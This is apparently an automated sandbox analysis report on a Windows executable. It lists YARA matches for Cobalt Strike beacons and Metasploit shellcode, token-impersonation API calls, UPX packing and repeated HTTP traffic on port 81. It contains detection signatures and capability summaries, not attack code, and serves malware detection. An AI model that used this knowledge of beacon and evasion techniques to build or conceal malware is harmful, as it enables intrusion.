            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_03890240 CreateProcessAsUserA, GetLastError, GetLastError, CreateProcessA, GetLastError, GetCurrentDirectoryW, GetCurrentDirectoryW, CreateProcessWithTokenW, GetLastError, GetLastError, GetLastError, GetLastError
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.k2vUsu5VZ5.exe.3880000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: WiltedTulip_ReflectiveLoader, date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Trojan_Raw_Generic_4, date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_ee756db7, os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_663fc95d, os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_b54b94ac, reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc, reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Beacon_K5om, date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: CobaltStrike_Unmodifed_Beacon, date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Leviathan_CobaltStrike_Sample_1, date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: crime_win32_csbeacon_1, date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: WiltedTulip_ReflectiveLoader, date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_CobaltStrike, author = ditekSHen, description = CobaltStrike payload
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR, Matched rule: Windows_Trojan_CobaltStrike_ee756db7, os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR, Matched rule: CobaltStrike_Unmodifed_Beacon, date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTR, Matched rule: WiltedTulip_ReflectiveLoader, date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engine, Classification label: mal100.troj.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_0388FE7C LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0388FE7C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_03896CB0 TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_03896CB0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: k2vUsu5VZ5.exe, ReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess,0_2_0040DF90
            Source: k2vUsu5VZ5.exe, Static PE information: section name: UPX2
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_038B716C push 0000006Ah; retf 0_2_038B7184
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_00160109 push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_00160128 push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_001602CF push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_034A8B56 push ebp; iretd 0_2_034A8B57
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_03489B65 push cs; retf 0_2_03489B66
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_034A8B76 push ebp; iretd 0_2_034A8B77
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_034A8B9F push ebp; iretd 0_2_034A8BA0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_0348B19F push ebp; iretd 0_2_0348B1A0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exe, Code function: 0_2_034897A4 push edi; iretd 0_2_034897A5
            Source: initial sample, Static PE information: section name: UPX0
            Source: initial sample, Static PE information: section name: UPX1

            Hooking and other Techniques for Hiding and Protection

            Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 81
            Source: unknown, Network traffic detected: HTTP traffic on port 81 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50143
            Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50144
            Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50145
            Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50146
            Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50147
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50148
            Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50149
            Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50150
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50151
            Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50152
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50153
            Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50154
            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50155
            Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50156
            Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50157
            Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50158
            Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50159
            Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50161
            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50162
